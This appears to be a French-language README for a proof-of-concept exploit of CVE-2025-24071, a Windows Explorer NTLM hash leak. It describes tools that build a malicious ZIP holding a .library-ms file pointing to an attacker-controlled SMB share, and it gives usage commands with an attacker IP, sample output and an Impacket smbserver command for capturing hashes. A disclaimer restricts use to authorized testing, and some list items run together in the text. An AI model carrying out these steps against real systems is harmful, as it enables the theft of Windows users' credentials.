
Preuve de concept pour CVE-2025-24071, générant un fichier ZIP malveillant qui déclenche la divulgation du hash NTLM via l'Explorateur Windows, utilisé avec un serveur SMB pour la capture d'identifiants.
Ce dépôt contient une preuve de concept (PoC) pour la CVE-2025-24071, une vulnérabilité de fuite de hachage NTLM dans l'Explorateur de fichiers Windows. Cette vulnérabilité permet à un attaquant de voler des hachages NTLM en exploitant la manière dont Windows gère les fichiers .library-ms malveillants.
.library-ms malveillant contenant un chemin de partage SMB contrôlé par l'attaquant..library-ms.CVE-2025-24071-POC.exe : Exécutable Windows qui génère le fichier ZIP malveillantCVE-2025-24071-POC.py : Script Python équivalent pour les environnements Linux/macOSCVE-2025-24071-POC.exe -i <IP_attaquant> -n <nom>
python3 CVE-2025-24071-POC.py -i <IP_attaquant> -n <nom>
CVE-2025-24071-POC.exe -i 10.10.14.8 -n try
ZIP créé : try.zip
Pour capturer les hachages NTLM, vous devez configurer un serveur SMB à l'aide d'Impacket :
smbserver.py try /root/smbshare -smb2support -ip 10.10.14.8 -debug
Cette preuve de concept est fournie à des fins éducatives et de test d'intrusion uniquement. N'utilisez cet outil que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite. L'utilisation abusive de cet outil peut entraîner des poursuites pénales.
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.